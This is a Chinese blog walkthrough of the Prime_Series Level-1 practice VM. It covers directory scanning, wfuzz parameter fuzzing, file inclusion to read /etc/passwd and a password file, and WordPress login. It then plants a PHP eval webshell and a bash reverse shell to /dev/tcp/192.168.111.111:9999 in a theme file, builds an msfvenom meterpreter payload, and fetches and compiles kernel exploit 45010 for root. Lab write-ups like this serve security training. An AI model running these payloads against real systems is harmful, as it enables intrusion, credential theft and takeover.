首页 > 其他分享 >渗透测试(五)- prime_Series靶机攻略

渗透测试(五)- prime_Series靶机攻略

时间:2024-11-30 16:29:40浏览次数:10  
标签:prime txt http -- Series 192.168 111.4 靶机 php

靶机地址:

通过百度网盘分享的文件:Prime_Series_Level-1.rar
链接:https://pan.baidu.com/s/10ibEa4y6C8lKRsTHY1ROTw?pwd=a6cr 
提取码:a6cr 
--来自百度网盘超级会员V1的分享

实现步骤:

主机发现,使用arp-scan -l命令扫描局域网内存在的设备

发现了192.168.111.4的靶机IP地址

在扫描该靶机开放的端口,发现开启了22,80端口

打开网页,只有一张图片,没有任何其他信息

使用dirb目录扫描

打开/dev,看到了以下信息

使用dirb工具扫描PHP文件和TXT文件,这里扫出了三个

dirb http://192.168.119.128 -X .php,.txt

打开/secret.txt发现提示中提供了一个可用的fuzz工具

根据提示,通过fuzz出正确参数,读取该文件。根据工具使用说明,使用如下命令。

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt  --hl 7 http://192.168.111.4/index.php?FUZZ=location.txt

说明:-w 指定字典路径。

      --hl 7 是过滤条件,过滤Lines为7L的响应结果,过滤条件还可以过滤响应码如--hc 404、过滤Word如--hw 42、过滤Chars如--hh 334。

      FUZZ 是指定爆破的位置,字典会在FUZZ位置跑。

利用工具发现了可利用的参数是file,通过浏览器访问http://192.168.111.4/index.php?file=location.txt

得到下一阶段提示:在其他PHP页面中有secrettier360参数可以被利用。

继续使用fuzzing工具。

命令:wfuzz -w /usr/share/wfuzz/wordlist/Injections/All_attack.txt --hl 6 http://192.168.111.4/image.php?secrettier360=FUZZ

这里使用了另一个wordlist,All_attack.txt里有常用敏感路径。

同样浏览器访问192.168.111.4/image.php?secrettier360=/etc/passwd

获得提示:find password.txt file in my directory:/home/saket

所以浏览器访问:http://192.168.111.4/image.php?secrettier360=/home/saket/password.txt

获得密码:follow_the_ippsec

在阶段一扫描目录时,已知该网站是个WordPress。可以访问:http://192.168.119.128/wordpress/ 可以看到有个Victor用户。

Follow_the_ippsec

点进登录界面,尝试用获取的密码登录,可以看到成功登录

使用一句话木马注入,发现无法使用意见进行连接,尝试换个方法

<?php $eval($_POST['cmd']);?>

MSF反弹shell

让受害者的服务器主动连我们 反弹连接shell

Msf开启监听端口7777,并设置目标主机

 MSF生成木马文件
msfvenom -p php/meterpreter/reverse_tcp lhost=kali IP  lport=开放端口 -o shell.php(木马文件)

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.184.135  lport=7777 -o shell.php

或者复制以下代码

<?php

exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.111.111/9999 0>&1'");

?>

Wordpress  目录    wordpress/wp-content/themes/twentynineteen

构造Payload  http://192.168.111.4/wordpress/wp-content/themes/twentynineteen/secret.php

浏览器访问Payload   访问链接 直接反弹连接

尝试提权,sudo –l查看权限,发现目录/home/saket/enc,提示信息(root) NOPASSWD: /home/saket/enc

查看/home/saket/enc,打开发现了user.txt

打开后,发现了flag

同时我们用ls -liah也可以看到,我们没有对enc的读权限,它应该是一个重要文件

但是找了一圈也没发现什么密码,我们用uname -a查看版本发现是较早的版本:

Linux ubuntu 4.10.0-28-generic

那么查找一下漏洞用searchsploit命令

searchsploit Linux ubuntu 4.10.0-28

下载漏洞并查看

应该就是gcc编译一下就可以了

打开php服务

同时再靶机中进行下载

wget http://192.168.111.111/45010.c

编译执行

提权成功,给shell环境

python -c "import pty;pty.spawn('/bin/bash')"

标签:prime,txt,http,--,Series,192.168,111.4,靶机,php
From: https://blog.csdn.net/weixin_72060499/article/details/144156837

相关文章

  • 【Chapter 6】Machine Learning time series Case_Monthly sales forecast analysis-H
    文章目录1、Holt-Wintersalgorithm(1)additivemodel(2)Multiplicationmodel(3)Dampingtrend2、AdvantagesanddisadvantagesofHoltWintersalgorithmAdvantagesdisadvantages3、ComparisonofalgorithmimplementationbetweenPythoncodeandSentosa_DS......
  • Chili靶机渗透
    获取ip:获取端口号:可以看到不存在ssh服务了,但是存在ftp和http服务:扫描一下http服务:访问网址:查看源代码只发现一个标题:扫描一下目录信息:没有扫描到什么东西,换一个密码本:gobuster:也是没有什么东西,就尝试爆破一下ftp:爆破到密码和用户:尝试登录:登录成功那么就......
  • Vulnhub-Earth靶机笔记
    Earth靶机笔记概述这是一台Vulnhub的靶机,主要是Earth靶机地址:https://vulnhub.com/entry/the-planets-earth,755/#download一、nmap扫描1、端口扫描-sT以TCP全连接扫描,--min-rate10000以最低10000速率进行扫描,-p-进行全端口扫描,-oports结果输出到ports文件......
  • P1217 [USACO1.5] 回文质数 Prime Palindromes
    标题:P1217[USACO1.5]回文质数PrimePalindromes链接:https://www.luogu.com.cn/problem/P1217思路:1.暴力枚举,超时2.回文和质数共同判断,超时3.数字通过strings=to_string(n);转化为字符串,超时+:字符串转为数字intx=stoi(n);4.找规律,有偶数位的回文数(除了11)必然不是质数......
  • #靶机#--红队靶机vulnstack-2
    环境搭建打开web虚拟机用其他用户凭证登陆,密码过期修改密码就登陆成功了管理员账号密码:administrator/2wsx#EDCde1ay/1qaz@WSX管理员身份打开C:\Oracle\Middleware\user_projects\domains\base_domain\bin\starWebLogicnmap扫描主机发现nmap-sn-ohosts192.16......
  • CSP/信奥赛C++语法基础刷题训练(23):洛谷P1217:[USACO1.5] 回文质数 Prime Palindromes
    CSP/信奥赛C++语法基础刷题训练(23):洛谷P1217:[USACO1.5]回文质数PrimePalindromes题目描述因为151151151既是一个质数又是一个回文数(从左到右和从右到左是看一样的),......
  • Sickos1.1 详细靶机思路 实操笔记
    Sickos1.1详细靶机思路实操笔记免责声明本博客提供的所有信息仅供学习和研究目的,旨在提高读者的网络安全意识和技术能力。请在合法合规的前提下使用本文中提供的任何技术、方法或工具。如果您选择使用本博客中的任何信息进行非法活动,您将独自承担全部法律责任。本博客明确表......
  • Vulhub Bob: 1.0.1靶机详解
    项目地址https://download.vulnhub.com/bob/Bob_v1.0.1.ova实验过程开启靶机虚拟机使用nmap进行主机发现,获取靶机IP地址nmap192.168.47.1-254根据对比可知Bob:1.0.1的一个ip地址为192.168.47.173扫描Bob:1.0.1的操作系统,端口及对应服务nmap-A-p-192.168.......
  • 游戏革命!Series AI获2800万美元融资,携手Netflix、戴尔打造GenAI游戏开发平台
     一句话定位Series是一家通过生成式AI技术,为游戏开发者提供全栈游戏创作平台的公司,致力于革新未来的游戏开发模式。一、数据概览成立时间:2023年种子轮融资:790万美元,由a16z领投A轮融资:2800万美元,投资方包括Netflix、DellTechnologiesCapital、a16z、BITKRAFT和F4Fu......
  • vulnhub-XXE靶机的测试报告
    目录一、测试环境1、系统环境2、使用工具/软件二、测试目的三、操作过程1、信息搜集2、xml外部实体注入四、结论一、测试环境1、系统环境渗透机:kali2021.1(192.168.202.134)靶 机:ubuntu17.10(192.168.202.161)2、使用工具/软件Kali:arp-scan(主机探测)、nmap......